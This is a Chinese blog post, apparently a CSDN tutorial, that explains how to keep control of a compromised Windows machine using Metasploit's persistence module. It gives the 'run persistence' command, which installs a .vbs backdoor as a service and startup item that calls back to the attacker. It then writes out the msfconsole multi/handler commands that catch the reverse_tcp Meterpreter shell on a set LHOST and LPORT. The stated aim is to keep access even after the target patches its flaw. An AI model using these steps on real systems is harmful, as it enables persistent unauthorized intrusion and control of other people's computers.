渗透之——Metasploit访问控制的持久化

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358463

工具:Metasploit

为了实现这一点,可以选择在目标计算机上添加一个新的用户,也可以选择使用MSF中persistence模块。

运行persistence模块可以通过在目标计算机上安装一个永久性的后门来实现访问控制的持久化。这样,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。

这里,我们假设经过了一系列的渗透拿到了system权限的meterpreter,我们在meterpreter命令行执行如下命令:

run persistence

运行persistence模块会向目标计算机上传一个.vbs类型的恶意脚本文件,并在目标计算机上执行这个恶意脚本文件。这个脚本一旦在目标计算机上运行,每隔几秒钟就会主动连接攻击者的计算机。这个恶意脚本文件会被当做一个系统服务安装在目标计算机系统中,同时,会被添加到开机启动项中,因此,无论目标计算机重启多少次,该恶意服务都可以运行。除非卸载该服务或手动删除文件,否则恶意服务一直存在。

这里,我们重新开启一个MSF来验证:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.109.137
set LPORT 4444
exploit

此处需要注意的是:我们设置攻击载荷和LPORT选项必须与运行persistence模块时设置的攻击载荷和LPORT选项相同。

发出攻击命令exploit后,exploit/multi/handler开始等待从目标系统上发回来的连接。一旦传入的连接被检测到,控制端就会切换到Meterpreter命令行。

 

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值